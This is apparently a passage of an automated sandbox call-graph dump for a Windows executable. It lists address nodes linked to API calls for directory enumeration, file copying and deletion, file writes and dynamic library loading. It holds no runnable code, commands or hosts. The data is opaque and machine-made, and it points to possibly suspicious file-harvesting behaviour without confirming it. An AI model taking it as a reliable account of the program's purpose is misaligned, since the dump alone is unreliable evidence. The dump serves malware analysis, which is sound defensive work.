417d8f 19446->19447 19448 403bbc 3 API calls 19447->19448 19449 417da7 19448->19449 19450 403b80 SysFreeString 19449->19450 19451 417dbc 19450->19451 19451->19361 19453 403e24 19452->19453 19458 403b58 19453->19458 19455 403e39 19464 403b70 19455->19464 19459 403b6c 19458->19459 19460 403b5c SysAllocStringLen 19458->19460 19459->19455 19460->19459 19461 403b50 19460->19461 19462 404110 19461->19462 19463 4040fa SysAllocStringLen 19461->19463 19462->19455 19463->19461 19463->19462 19465 403b76 SysFreeString 19464->19465 19466 403b7c 19464->19466 19465->19466 19468 4040b0 3 API calls 19467->19468 19469 4062ea 19468->19469 19470 4040b0 3 API calls 19469->19470 19471 406315 19470->19471 19471->18547 19473 4040f4 SysAllocStringLen 19472->19473 19474 4081bc 19473->19474 19475 40795c 26 API calls 19474->19475 19488 4081e2 19475->19488 19476 4082a3 19477 403b98 SysFreeString 19476->19477 19478 4082bd 19477->19478 19479 403508 7 API calls 19478->19479 19480 4082ca 19479->19480 19481 4047b4 9 API calls 19480->19481 19482 4082d8 19481->19482 19483 4034e4 7 API calls 19482->19483 19484 4082e0 19483->19484 19485 403b80 SysFreeString 19484->19485 19486 4082e8 19485->19486 19486->18551 19487 4039f0 21 API calls 19487->19488 19488->19476 19488->19487 19489 403e1c 3 API calls 19488->19489 19510 4072a0 19488->19510 19489->19488 19492 403dcf 19491->19492 19493 403e15 19492->19493 19494 403b58 2 API calls 19492->19494 19497 4076b0 19493->19497 19495 403dec 19494->19495 19496 403b70 SysFreeString 19495->19496 19496->19493 19498 4040f4 SysAllocStringLen 19497->19498 19499 4076c0 19498->19499 19500 4076d6 GetFileAttributesW 19499->19500 19501 4076f3 19500->19501 19502 403b80 SysFreeString 19501->19502 19503 4076fb 19502->19503 19503->18556 19503->18557 19505 4040bd 19504->19505 19509 4040c4 19504->19509 19506 403b58 2 API calls 19505->19506 19506->19509 19507 403b70 SysFreeString 19508 4040ed 19507->19508 19508->18565 19509->19507 19511 4040f4 SysAllocStringLen 19510->19511 19512 4072b5 19511->19512 19513 4072e2 CreateFileW 19512->19513 19514 4072fc 19513->19514 19515 4039e8 21 API calls 19514->19515 19516 407305 WriteFile FindCloseChangeNotification 19515->19516 19517 407323 19516->19517 19518 4034e4 7 API calls 19517->19518 19519 40732b 19518->19519 19520 403b80 SysFreeString 19519->19520 19521 407333 19520->19521 19521->19488 19523 409210 19522->19523 19523->19523 19524 4093b3 19523->19524 19525 408120 21 API calls 19523->19525 19526 403b98 SysFreeString 19524->19526 19527 409249 19525->19527 19528 4093cd 19526->19528 19531 4062d8 3 API calls 19527->19531 19529 403508 7 API calls 19528->19529 19530 4093da 19529->19530 19532 403b98 SysFreeString 19530->19532 19533 409265 19531->19533 19534 4093e7 19532->19534 19912 408d44 19533->19912 19536 403508 7 API calls 19534->19536 19538 4093f4 19536->19538 19540 403b98 SysFreeString 19538->19540 19539 408120 21 API calls 19541 409289 19539->19541 19542 409401 19540->19542 19545 4062d8 3 API calls 19541->19545 19543 403508 7 API calls 19542->19543 19544 40940e 19543->19544 19546 403b98 SysFreeString 19544->19546 19547 4092a5 19545->19547 19548 40941b 19546->19548 19549 408d44 36 API calls 19547->19549 19550 403508 7 API calls 19548->19550 19551 4092b3 19549->19551 19552 409428 19550->19552 19553 408120 21 API calls 19551->19553 19554 403b98 SysFreeString 19552->19554 19555 4092c9 19553->19555 19556 409435 19554->19556 19559 4062d8 3 API calls 19555->19559 19557 403508 7 API calls 19556->19557 19558 409442 19557->19558 19560 403b98 SysFreeString 19558->19560 19561 4092e5 19559->19561 19562 40944f 19560->19562 19563 408d44 36 API calls 19561->19563 19564 403508 7 API calls 19562->19564 19565 4092f3 19563->19565 19566 40945c 19564->19566 19567 408120 21 API calls 19565->19567 19584 409ab0 19566->19584 19568 409309 19567->19568 19569 4062d8 3 API calls 19568->19569 19570 409325 19569->19570 19571 408d44 36 API calls 19570->19571 19572 409333 19571->19572 19573 408120 21 API calls 19572->19573 19574 409349 19573->19574 19575 4062d8 3 API calls 19574->19575 19576 409365 19575->19576 19577 408d44 36 API calls 19576->19577 19578 409373 19577->19578 19579 408120 21 API calls 19578->19579 19580 409389 19579->19580 19589 409ab8 19584->19589 19585 40a373 19586 403b98 SysFreeString 19585->19586 19587 40a390 19586->19587 19588 403b98 SysFreeString 19587->19588 19590 40a39d 19588->19590 19589->19585 19591 4062d8 3 API calls 19589->19591 19718 40b3ec 19590->19718 19592 409b04 19591->19592 20027 4098a0 19592->20027 19594 409b10 19595 4062d8 3 API calls 19594->19595 19596 409b39 19595->19596 19597 4098a0 44 API calls 19596->19597 19598 409b45 19597->19598 19599 4062d8 3 API calls 19598->19599 19600 409b6e 19599->19600 19601 4098a0 44 API calls 19600->19601 19602 409b7a 19601->19602 19603 4062d8 3 API calls 19602->19603 19604 409ba3 19603->19604 19605 4098a0 44 API calls 19604->19605 19720 40b405 19718->19720 20146 40b15c 19718->20146 19721 40aec4 19720->19721 19722 40357c 7 API calls 19721->19722 19723 40aefb 19722->19723 20183 40ae30 19723->20183 19725 40b073 19726 403508 7 API calls 19725->19726 19727 40b0a1 19726->19727 19732 40bd9c 19727->19732 19728 403a30 21 API calls 19730 40af06 19728->19730 19729 4039f0 21 API calls 19729->19730 19730->19725 19730->19728 19730->19729 19731 405210 26 API calls 19730->19731 19731->19730 19733 40bdc2 19732->19733 19913 408d4d 19912->19913 19913->19913 19914 4040f4 SysAllocStringLen 19913->19914 19915 408d69 19914->19915 19916 4047a8 26 API calls 19915->19916 19917 408d9c 19916->19917 19918 403db8 3 API calls 19917->19918 19919 408dbd 19918->19919 19920 408dc8 FindFirstFileW 19919->19920 19947 408dd5 19920->19947 19921 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 19921->19947 19922 408e2a GetFileAttributesW 19922->19947 19923 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 19923->19947 19924 409102 19925 403508 7 API calls 19924->19925 19927 409191 19925->19927 19928 403b98 SysFreeString 19927->19928 19929 4091a1 19928->19929 19930 4034e4 7 API calls 19929->19930 19931 4091a9 19930->19931 19932 4047b4 9 API calls 19931->19932 19933 4091b7 19932->19933 19934 403508 7 API calls 19933->19934 19935 4091c4 19934->19935 19936 4034e4 7 API calls 19935->19936 19937 4091cc 19936->19937 19939 403b80 SysFreeString 19937->19939 19938 403798 21 API calls 19938->19947 19940 4091d4 19939->19940 19941 4034e4 7 API calls 19940->19941 19942 4091dc 19941->19942 19942->19539 19943 406984 21 API calls 19943->19947 19944 4039e8 21 API calls 19944->19947 19945 4034e4 7 API calls 19945->19947 19946 4036cc 21 API calls 19946->19947 19947->19921 19947->19922 19947->19923 19947->19924 19947->19938 19947->19943 19947->19944 19947->19945 19947->19946 19949 408a44 19947->19949 19979 405210 19947->19979 19950 408a4c 19949->19950 19950->19950 19951 4040f4 SysAllocStringLen 19950->19951 19952 408a62 19951->19952 19953 4047a8 26 API calls 19952->19953 19954 408a84 19953->19954 20001 407168 19954->20001 19956 408a92 19957 408120 21 API calls 19956->19957 19958 408aa8 19957->19958 19959 403850 21 API calls 19958->19959 19960 408abd 19959->19960 19961 407428 21 API calls 19960->19961 19962 408acd 19961->19962 19963 40357c 7 API calls 19962->19963 19971 408ad8 19963->19971 19964 403850 21 API calls 19964->19971 19965 408cbd 19967 403508 7 API calls 19965->19967 19966 408120 21 API calls 19966->19971 19968 408cd7 19967->19968 19969 403b80 SysFreeString 19968->19969 19970 408cdf 19969->19970 19970->19947 19971->19964 19971->19965 19971->19966 19972 4039f0 21 API calls 19971->19972 19973 407428 21 API calls 19971->19973 19974 4037dc 21 API calls 19971->19974 19975 403798 21 API calls 19971->19975 19977 4047a8 26 API calls 19971->19977 19978 403538 21 API calls 19971->19978 20016 403a30 19971->20016 19972->19971 19973->19971 19974->19971 19975->19971 19977->19971 19978->19971 19982 40522a 19979->19982 19980 4047a8 26 API calls 19981 4052fe 19980->19981 19983 403538 21 API calls 19981->19983 19982->19980 19989 40539f 19982->19989 19984 405319 19983->19984 19985 403538 21 API calls 19984->19985 19986 405331 19985->19986 19987 403538 21 API calls 19986->19987 19988 405349 19987->19988 19990 403538 21 API calls 19988->19990 19992 403508 7 API calls 19989->19992 19991 405361 19990->19991 19995 403538 21 API calls 19991->19995 19993 4053b9 19992->19993 19994 403508 7 API calls 19993->19994 19996 4053c6 19994->19996 19997 405379 19995->19997 19996->19947 19998 403538 21 API calls 19997->19998 19999 405391 19998->19999 20000 4050c8 21 API calls 19999->20000 20000->19989 20002 4040f4 SysAllocStringLen 20001->20002 20003 407182 20002->20003 20004 4034e4 7 API calls 20003->20004 20005 407198 20004->20005 20006 4034e4 7 API calls 20005->20006 20008 4071a0 20006->20008 20007 407200 20009 403ac0 21 API calls 20007->20009 20008->20007 20010 407275 20008->20010 20013 40721f 20009->20013 20011 4034e4 7 API calls 20010->20011 20012 40728a 20011->20012 20014 403b80 SysFreeString 20012->20014 20013->19956 20015 407292 20014->20015 20015->19956 20021 4039e0 20016->20021 20018 403a74 20018->19971 20019 403a3e 20019->20018 20020 403ac0 21 API calls 20019->20020 20020->20018 20022 40399c 20021->20022 20023 4039d7 20022->20023 20024 4035a8 21 API calls 20022->20024 20023->20019 20025 4039b3 20024->20025 20025->20023 20026 402550 7 API calls 20025->20026 20026->20023 20028 4098f4 20027->20028 20029 4040f4 SysAllocStringLen 20027->20029 20030 4040f4 SysAllocStringLen 20028->20030 20029->20028 20031 4098fc 20030->20031 20032 403b80 SysFreeString 20031->20032 20033 409917 20032->20033 20034 403db8 3 API calls 20033->20034 20035 40992b 20034->20035 20036 409936 FindFirstFileW 20035->20036 20038 409942 20036->20038 20037 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 20037->20038 20038->20037 20039 4076b0 3 API calls 20038->20039 20040 409a36 FindNextFileW 20038->20040 20046 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 20038->20046 20049 403e1c 3 API calls 20038->20049 20050 4095a4 20038->20050 20039->20038 20040->20038 20041 409a49 FindClose 20040->20041 20042 409a60 20041->20042 20043 403b98 SysFreeString 20042->20043 20044 409a70 20043->20044 20045 403b98 SysFreeString 20044->20045 20047 409a7d 20045->20047 20046->20038 20047->19594 20049->20040 20051 4095ad 20050->20051 20051->20051 20052 4040f4 SysAllocStringLen 20051->20052 20053 4095c9 20052->20053 20054 4040f4 SysAllocStringLen 20053->20054 20055 4095d1 20054->20055 20056 4040f4 SysAllocStringLen 20055->20056 20057 4095d9 20056->20057 20058 4034e4 7 API calls 20057->20058 20059 4095ef 20058->20059 20060 406fdc 4 API calls 20059->20060 20061 409600 20060->20061 20101 406f1c 20061->20101 20129 4027b4 QueryPerformanceCounter 20101->20129 20103 406f40 20104 406fdc 4 API calls 20103->20104 20105 406f7b 20104->20105 20106 406fdc 4 API calls 20105->20106 20130 4027c1 20129->20130 20131 4027cc GetTickCount 20129->20131 20130->20103 20131->20103 20147 40b164 20146->20147 20147->20147 20148 408120 21 API calls 20147->20148 20149 40b18a 20148->20149 20150 408120 21 API calls 20149->20150 20151 40b1a0 20150->20151 20152 40b1a8 LoadLibraryA GetProcAddress 20151->20152 20153 40b1c7 20152->20153 20154 408120 21 API calls 20153->20154 20155 40b1fb 20154->20155 20156 40b203 LoadLibraryA 20155->20156 20157 40b213 20156->20157 20158 40b36e 20156->20158 20159 408120 21 API calls 20157->20159 20160 403508 7 API calls 20158->20160 20161 40b220 20159->20161 20162 40b388 20160->20162 20164 40b228 GetProcAddress 20161->20164 20163 403b98 SysFreeString 20162->20163 20165 40b395 20163->20165 20166 408120 21 API calls 20164->20166 20168 403508 7 API calls 20165->20168 20167 40b23e 20166->20167 20170 40b246 GetProcAddress 20167->20170 20169 40b3a2 20168->20169 20171 403508 7 API calls 20169->20171 20172 408120 21 API calls 20170->20172 20173 40b3af 20171->20173 20174 40b25c 20172->20174 20175 404224 9 API calls 20173->20175 20177 40b264 GetProcAddress 20174->20177 20176 40b3c2 20175->20176 20176->19720 20181 40b27f 20177->20181 20178 4047b4 9 API calls 20178->20181 20179 40370c 22 API calls 20179->20181 20180 408120 21 API calls 20180->20181 20181->20158 20181->20178 20181->20179 20181->20180 20182 405210 26 API calls 20181->20182 20182->20181 20184 40ae42 20183->20184 20185 4034e4 7 API calls 20184->20185 20186 40ae57 20185->20186 20193 40ad80 20186->20193 20189 40ae6a 20191 4034e4 7 API calls 20189->20191 20192 40ae7f 20191->20192 20192->19730 20194 40adad 20193->20194 20195 407500 8 API calls 20194->20195 20196 40adbf 20195->20196 20197 403b98 SysFreeString 20196->20197 20198 40ae03 20197->20198 20199 4034e4 7 API calls 20198->20199 20200 40ae0b 20199->20200 20200->20189 20201 40acb8 20200->20201 20202 40accf 20201->20202 20203 4034e4 7 API calls 20202->20203 20204 40ace4 20203->20204 20215 40a4dc OleInitialize 20204->20215 20216 4047a8 26 API calls 20215->20216 20217 40a51d 20216->20217 20252 40a4a4 20217->20252 20276 404900 20252->20276 20591 40f94c 20590->20591 20592 4062d8 3 API calls 20591->20592 20593 40f997 20592->20593 20930 40f6ac 20593->20930 20595 40f9b0 20596 4062d8 3 API calls 20595->20596 20597 40f9d9 20596->20597 20598 40f6ac 35 API calls 20597->20598 20599 40f9f2 20598->20599 20600 4062d8 3 API calls 20599->20600 20601 40fa1b 20600->20601 20602 40f6ac 35 API calls 20601->20602 20603 40fa34 20602->20603 20604 4062d8 3 API calls 20603->20604 20605 40fa5d 20604->20605 20606 40f6ac 35 API calls 20605->20606 20607 40fa76 20606->20607 20608 4062d8 3 API calls 20607->20608 20609 40fa9f 20608->20609 20610 40f6ac 35 API calls 20609->20610 20611 40fab8 20610->20611 20612 4062d8 3 API calls 20611->20612 20613 40fae1 20612->20613 20614 40f6ac 35 API calls 20613->20614 20615 40fafa 20614->20615 20616 4062d8 3 API calls 20615->20616 20617 40fb23 20616->20617 20931 40f6b5 20930->20931 20931->20931 20932 4040f4 SysAllocStringLen 20931->20932 20933 40f6d4 20932->20933 20934 4040f4 SysAllocStringLen 20933->20934 20935 40f6dc 20934->20935 20936 4040f4 SysAllocStringLen 20935->20936 20937 40f6e4 20936->20937 20938 403db8 3 API calls 20937->20938 20942 40f712 20938->20942 20939 403d10 4 API calls 20939->20942 20940 403e1c 3 API calls 20940->20942 20942->20939 20942->20940 20943 403798 21 API calls 20942->20943 20944 40f783 20942->20944 21039 40f440 20942->21039 20943->20942 20945 403e1c 3 API calls 20944->20945 20949 40f7ab 20945->20949 20946 403d10 4 API calls 20946->20949 20947 403e1c 3 API calls 20947->20949 20948 40f440 27 API calls 20948->20949 20949->20946 20949->20947 20949->20948 20950 403798 21 API calls 20949->20950 20951 40f81c 20949->20951 20950->20949 20952 40f870 20951->20952 20953 403e1c 3 API calls 20951->20953 20955 403b80 SysFreeString 20952->20955 20954 40f851 20953->20954 21064 40dce8 20954->21064 20956 40f888 20955->20956 20957 4034e4 7 API calls 20956->20957 20959 40f893 20957->20959 20960 403b98 SysFreeString 20959->20960 20961 40f8a3 20960->20961 20962 4034e4 7 API calls 20961->20962 20963 40f8ae 20962->20963 20964 403b98 SysFreeString 20963->20964 20965 40f8be 20964->20965 20966 4034e4 7 API calls 20965->20966 20967 40f8c9 20966->20967 20968 403b80 SysFreeString 20967->20968 20969 40f8d4 20968->20969 20970 4034e4 7 API calls 20969->20970 20971 40f8dc 20970->20971 20972 403b98 SysFreeString 20971->20972 20973 40f8e9 20972->20973 20973->20595 21040 40f448 21039->21040 21040->21040 21041 4040f4 SysAllocStringLen 21040->21041 21042 40f460 21041->21042 21043 4034e4 7 API calls 21042->21043 21044 40f476 21043->21044 21045 407168 23 API calls 21044->21045 21046 40f481 21045->21046 21047 40795c 26 API calls 21046->21047 21060 40f491 21047->21060 21048 40f5fd 21049 403538 21 API calls 21048->21049 21050 40f608 21049->21050 21051 4047b4 9 API calls 21050->21051 21052 40f616 21051->21052 21053 403508 7 API calls 21052->21053 21054 40f630 21053->21054 21055 4047b4 9 API calls 21054->21055 21056 40f63e 21055->21056 21057 403b80 SysFreeString 21056->21057 21058 40f646 21057->21058 21058->20942 21059 4039f0 21 API calls 21059->21060 21060->21048 21060->21059 21061 40357c 7 API calls 21060->21061 21062 403850 21 API calls 21060->21062 21072 405148 21060->21072 21061->21060 21062->21060 21065 40dd01 21064->21065 21068 40dd48 21065->21068 21082 40dca8 21065->21082 21066 403508 7 API calls 21067 40dda2 21066->21067 21067->20952 21068->21066 21073 40515a 21072->21073 21074 4051ed 21073->21074 21076 4047a8 26 API calls 21073->21076 21075 4034e4 7 API calls 21074->21075 21077 405202 21075->21077 21078 4051c6 21076->21078 21077->21060 21079 403538 21 API calls 21078->21079 21080 4051e5 21079->21080 21081 4050c8 21 API calls 21080->21081 21081->21074 21083 4034e4 7 API calls 21082->21083 21085 40dcb6 21083->21085 21084 40dce2 21089 40d9ac 21084->21089 21085->21084 21086 403ac0 21 API calls 21085->21086 21087 40dccc 21086->21087 21088 40dcdc CharToOemBuffA 21087->21088 21088->21084 21090 40d9d0 21089->21090 21091 40357c 7 API calls 21090->21091 21092 40d9f1 21091->21092 21093 40357c 7 API calls 21092->21093 21094 40d9fc 21093->21094 21095 403ac0 21 API calls 21094->21095 21096 40da1b 21095->21096 21097 403ac0 21 API calls 21096->21097 21098 40da25 21097->21098 21099 4039e8 21 API calls 21098->21099 21100 40da2d 21099->21100 21101 4035d4 21 API calls 21100->21101 21102 40daed 21101->21102 21103 403850 21 API calls 21102->21103 21104 40db06 21103->21104 21105 4034e4 7 API calls 21104->21105 21106 40db0e 21105->21106 21107 4035d4 21 API calls 21106->21107 21108 40db1e 21107->21108 21109 403850 21 API calls 21108->21109 21110 40db34 21109->21110 21111 4034e4 7 API calls 21110->21111 21112 40db3c 21111->21112 21113 403508 7 API calls 21112->21113 21114 40db59 21113->21114 21114->21068 21512 4132e8 21510->21512 21511 413faa 21513 403b98 SysFreeString 21511->21513 21512->21511 21516 4062d8 3 API calls 21512->21516 21514 413fc7 21513->21514 21515 403b98 SysFreeString 21514->21515 21517 413fd7 21515->21517 21519 413343 21516->21519 21518 4034e4 7 API calls 21517->21518 21520 413fdf 21518->21520 21666 412d9c 21519->21666 21520->18176 21522 41335c 21523 4062d8 3 API calls 21522->21523 21524 413387 21523->21524 21525 412d9c 44 API calls 21524->21525 21526 4133a0 21525->21526 21527 4062d8 3 API calls 21526->21527 21528 4133cb 21527->21528 21529 412d9c 44 API calls 21528->21529 21530 4133e4 21529->21530 21531 4062d8 3 API calls 21530->21531 21532 41340f 21531->21532 21533 412d9c 44 API calls 21532->21533 21534 413428 21533->21534 21535 4062d8 3 API calls 21534->21535 21536 413453 21535->21536 21537 412d9c 44 API calls 21536->21537 21538 41346c 21537->21538 21539 4062d8 3 API calls 21538->21539 21540 413497 21539->21540 21541 412d9c 44 API calls 21540->21541 21542 4134b0 21541->21542 21543 4062d8 3 API calls 21542->21543 21544 4134db 21543->21544 21545 412d9c 44 API calls 21544->21545 21546 4134f4 21545->21546 21547 4062d8 3 API calls 21546->21547 21548 41351f 21547->21548 21549 412d9c 44 API calls 21548->21549 21667 412da5 21666->21667 21667->21667 21668 4040f4 SysAllocStringLen 21667->21668 21669 412dc4 21668->21669 21670 4040f4 SysAllocStringLen 21669->21670 21671 412dcc 21670->21671 21672 4040f4 SysAllocStringLen 21671->21672 21673 412dd4 21672->21673 21674 403db8 3 API calls 21673->21674 21675 412dfc 21674->21675 21676 412e07 FindFirstFileW 21675->21676 21692 412e10 21676->21692 21677 4076b0 3 API calls 21677->21692 21678 412f5e FindNextFileW 21679 412f76 FindClose 21678->21679 21678->21692 21680 412f8c 21679->21680 21681 403b98 SysFreeString 21680->21681 21683 412f9c 21681->21683 21682 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 21682->21692 21684 4034e4 7 API calls 21683->21684 21686 412fa7 21684->21686 21687 403b98 SysFreeString 21686->21687 21688 412fb7 21687->21688 21689 4034e4 7 API calls 21688->21689 21691 412fc2 21689->21691 21690 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 21690->21692 21693 403b98 SysFreeString 21691->21693 21692->21677 21692->21678 21692->21682 21692->21690 21697 40dce8 22 API calls 21692->21697 21730 4129a4 21692->21730 21694 412fd2 21693->21694 21695 403b98 SysFreeString 21694->21695 21696 412fdf 21695->21696 21696->21522 21697->21692 21731 4129ac 21730->21731 21731->21731 21732 4040f4 SysAllocStringLen 21731->21732 21733 4129c4 21732->21733 21734 403b80 SysFreeString 21733->21734 21735 4129da GetTickCount 21734->21735 21736 406fdc 4 API calls 21735->21736 21737 4129f5 21736->21737 21738 406f1c 10 API calls 21737->21738 21739 412a00 21738->21739 21740 403e1c 3 API calls 21739->21740 21741 412a15 21740->21741 21742 40781c 8 API calls 21741->21742 21743 412a20 21742->21743 21744 4062d8 3 API calls 21743->21744 21745 412a2d 21744->21745 21746 403e1c 3 API calls 21745->21746 21747 412a45 21746->21747 21748 40781c 8 API calls 21747->21748 21749 412a50 21748->21749 21750 412a63 CopyFileW 21749->21750 21751 412a74 21750->21751 21752 404afc 22 API calls 21751->21752 21753 412a7f 21752->21753 21754 4076b0 3 API calls 21753->21754 21777 412a92 21754->21777 21755 412a96 21756 403b98 SysFreeString 21755->21756 21757 412c24 21756->21757 21758 4034e4 7 API calls 21757->21758 21759 412c2c 21758->21759 21760 403b98 SysFreeString 21759->21760 21761 412c39 21760->21761 21762 403508 7 API calls 21761->21762 21763 412c46 21762->21763 21765 403b98 SysFreeString 21763->21765 21764 412bc1 21766 403bbc 3 API calls 21764->21766 21767 412c53 21765->21767 21768 412bfc 21766->21768 21770 4034e4 7 API calls 21767->21770 21772 412c04 DeleteFileW 21768->21772 21769 4034e4 7 API calls 21769->21777 21771 412c5b 21770->21771 21773 403b98 SysFreeString 21771->21773 21772->21755 21774 412c68 21773->21774 21775 403b80 SysFreeString 21774->21775 21776 412c70 21775->21776 21776->21692 21777->21755 21777->21764 21777->21769 21778 403e1c 3 API calls 21777->21778 21778->21777 21829 415618 21828->21829 21829->21829 21830 4040f4 SysAllocStringLen 21829->21830 21831 41562d 21830->21831 21832 4062d8 3 API calls 21831->21832 21833 41564e 21832->21833 21834 4047a8 26 API calls 21833->21834 21835 415663 21834->21835 21836 403bbc 3 API calls 21835->21836 21837 415684 21836->21837 21838 403bbc 3 API calls 21837->21838 21839 4156a5 21838->21839 21840 403bbc 3 API calls 21839->21840 21841 4156c6 21840->21841 21842 403bbc 3 API calls 21841->21842 21843 4156e7 21842->21843 21844 403bbc 3 API calls 21843->21844 21845 415708 21844->21845 21846 403bbc 3 API calls 21845->21846 21847 415729 21846->21847 21848 403db8 3 API calls 21847->21848 21857 41573d 21848->21857 21849 4076b0 3 API calls 21849->21857 21850 41587b 21851 407500 8 API calls 21850->21851 21852 4158c6 21851->21852 21853 415a02 21852->21853 21855 4076b0 3 API calls 21852->21855 21856 4047a8 26 API calls 21853->21856 21854 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 21854->21857 21858 4158df 21855->21858 21859 415a1e 21856->21859 21857->21849 21857->21850 21857->21854 21860 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 21857->21860 21983 40ddb0 21857->21983 21858->21853 22008 40770c 21858->22008 21864 403bbc 3 API calls 21859->21864 21860->21857 21866 415a3f 21864->21866 21865 403e1c 3 API calls 21867 415913 21865->21867 21868 403bbc 3 API calls 21866->21868 21869 40ddb0 30 API calls 21867->21869 21870 415a60 21868->21870 21871 415932 21869->21871 21874 403bbc 3 API calls 21870->21874 21872 40770c 6 API calls 21871->21872 21873 415948 21872->21873 21875 403e1c 3 API calls 21873->21875 21876 415a81 21874->21876 21877 415963 21875->21877 21878 403bbc 3 API calls 21876->21878 21879 403db8 3 API calls 21877->21879 21880 415aa2 21878->21880 21881 41598e 21879->21881 21884 403bbc 3 API calls 21880->21884 21882 40ddb0 30 API calls 21881->21882 21883 41599a 21882->21883 21885 40770c 6 API calls 21883->21885 21926 415ac3 21884->21926 21886 4159b0 21885->21886 21887 403e1c 3 API calls 21886->21887 21888 4159cb 21887->21888 21894 403db8 3 API calls 21888->21894 21889 415cad 21890 403b80 SysFreeString 21889->21890 21891 415cc5 21890->21891 21893 4034e4 7 API calls 21891->21893 21892 403db8 3 API calls 21892->21926 21895 415cd0 21893->21895 21896 4159f6 21894->21896 21898 403b98 SysFreeString 21895->21898 21899 40ddb0 30 API calls 21896->21899 21897 407500 8 API calls 21897->21926 21900 415ce0 21898->21900 21899->21853 21901 4034e4 7 API calls 21900->21901 21902 415ceb 21901->21902 21903 403b98 SysFreeString 21902->21903 21904 415cfb 21903->21904 21905 4034e4 7 API calls 21904->21905 21906 415d06 21905->21906 21907 403b98 SysFreeString 21906->21907 21908 415d16 21907->21908 21910 4034e4 7 API calls 21908->21910 21909 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 21909->21926 21911 415d21 21910->21911 21913 403b98 SysFreeString 21911->21913 21912 4076b0 SysFreeString SysAllocStringLen GetFileAttributesW 21912->21926 21914 415d31 21913->21914 21915 4034e4 7 API calls 21914->21915 21921 40ddb0 30 API calls 21921->21926 21926->21889 21926->21892 21926->21897 21926->21909 21926->21912 21926->21921 21984 4040f4 SysAllocStringLen 21983->21984 21985 40ddc9 21984->21985 21986 40de7f 21985->21986 21987 407168 23 API calls 21985->21987 21988 403b98 SysFreeString 21986->21988 21992 40de0b 21987->21992 21989 40de99 21988->21989 21990 403508 7 API calls 21989->21990 21991 40dea6 21990->21991 21994 403b80 SysFreeString 21991->21994 21993 40de59 21992->21993 21996 4062d8 3 API calls 21992->21996 21995 40dce8 22 API calls 21993->21995 21997 40deae 21994->21997 21998 40de64 21995->21998 22001 40de26 21996->22001 21997->21857 21999 4062d8 3 API calls 21998->21999 22000 40de71 21999->22000 22003 40de79 DeleteFileW 22000->22003 22002 40de37 CopyFileW 22001->22002 22002->21993 22004 40de41 22002->22004 22003->21986 22005 4062d8 3 API calls 22004->22005 22006 40de4e 22005->22006 22007 407168 23 API calls 22006->22007 22007->21993 22009 4040f4 SysAllocStringLen 22008->22009 22010 40771f 22009->22010 22011 403b80 SysFreeString 22010->22011 22015 407734 22011->22015 22012 40776d 22013 403b80 SysFreeString 22012->22013 22014 407789 22013->22014 22014->21865 22015->22012 22016 403ee8 4 API calls 22015->22016 22016->22012 22018 405050 22017->22018 22019 403538 21 API calls 22018->22019 22024 405068 22019->22024 22020 4050a5 22021 4034e4 7 API calls 22020->22021 22022 4050ba 22021->22022 22022->18688 22023 4039e8 21 API calls 22023->22024 22024->22020 22024->22023 22026 4141c0 22025->22026 22026->22026 22027 4040f4 SysAllocStringLen 22026->22027 22028 4141d6 22027->22028 22029 403b80 SysFreeString 22028->22029 22030 4141eb 22029->22030 22031 407168 23 API calls 22030->22031 22032 4141f6 22031->22032 22034 403a30 21 API calls 22032->22034 22060 4142af 22032->22060 22033 403b98 SysFreeString 22035 41436d 22033->22035 22039 414227 22034->22039 22036 403508 7 API calls 22035->22036 22037 41437a 22036->22037 22038 403b98 SysFreeString 22037->22038 22040 414387 22038->22040 22041 403a30 21 API calls 22039->22041 22039->22060 22042 403508 7 API calls 22040->22042 22046 41424f 22041->22046 22043 414394 22042->22043 22044 403b80 SysFreeString 22043->22044 22045 41439c 22044->22045 22045->18768 22047 4036cc 21 API calls 22046->22047 22046->22060 22048 414271 22047->22048 22049 407428 21 API calls 22048->22049 22050 414281 22049->22050 22069 4140f8 22050->22069 22052 4142ab 22053 407428 21 API calls 22052->22053 22052->22060 22054 4142d4 22053->22054 22056 403850 21 API calls 22054->22056 22055 414294 22055->22052 22076 414150 22055->22076 22058 4142f2 22056->22058 22059 407428 21 API calls 22058->22059 22061 414302 22059->22061 22060->22033 22062 40357c 7 API calls 22061->22062 22063 41430d 22062->22063 22064 4037dc 21 API calls 22063->22064 22065 41431b 22064->22065 22066 4140f8 3 API calls 22065->22066 22067 41432e 22066->22067 22067->22060 22068 414150 4 API calls 22067->22068 22068->22060 22070 4040f4 SysAllocStringLen 22069->22070 22071 414108 22070->22071 22072 41411e GetFileAttributesW 22071->22072 22073 414137 22072->22073 22074 403b80 SysFreeString 22073->22074 22075 41413f 22074->22075 22075->22055 22077 4040f4 SysAllocStringLen 22076->22077 22078 414160 22077->22078 22079 414176 GetFileAttributesW 22078->22079 22080 4140f8 3 API calls 22079->22080 22081 41418d 22080->22081 22082 403b80 SysFreeString 22081->22082 22083 4141a8 22082->22083 22083->22052 22085 4040f4 SysAllocStringLen 22084->22085 22086 4070d4 22085->22086 22087 4040f4 SysAllocStringLen 22086->22087 22088 4070dc 22087->22088 22089 4040f4 SysAllocStringLen 22088->22089 22094 4070e4 22089->22094 22090 407131 22091 403bbc 3 API calls 22090->22091 22092 40713c 22091->22092 22093 403b98 SysFreeString 22092->22093 22096 407156 22093->22096 22094->22090 22095 403f34 3 API calls 22094->22095 22098 403fc4 22094->22098 22095->22094 22096->18803 22100 403fdc 22098->22100 22099 404057 22099->22094 22100->22099 22101 403b58 2 API calls 22100->22101 22102 404007 22101->22102 22103 403b70 SysFreeString 22102->22103 22103->22099 22105 41781a 22104->22105 22106 4047a8 26 API calls 22105->22106 22109 417837 22105->22109 22106->22109 22107 4047b4 9 API calls 22108 4178a2 GlobalFix 22107->22108 22108->18836 22109->22107 22110->18854 22111->18859 22113 416faf 22112->22113 22113->18893 22115 403538 21 API calls 22114->22115 22116 407a75 22115->22116 22117 407a93 22116->22117 22118 407a84 22116->22118 22119 40357c 7 API calls 22117->22119 22120 40357c 7 API calls 22118->22120 22121 407a91 22119->22121 22120->22121 22315 407a34 GetPEB 22121->22315 22123 407aa5 22124 406fdc 4 API calls 22123->22124 22125 407acd 22124->22125 22126 406fdc 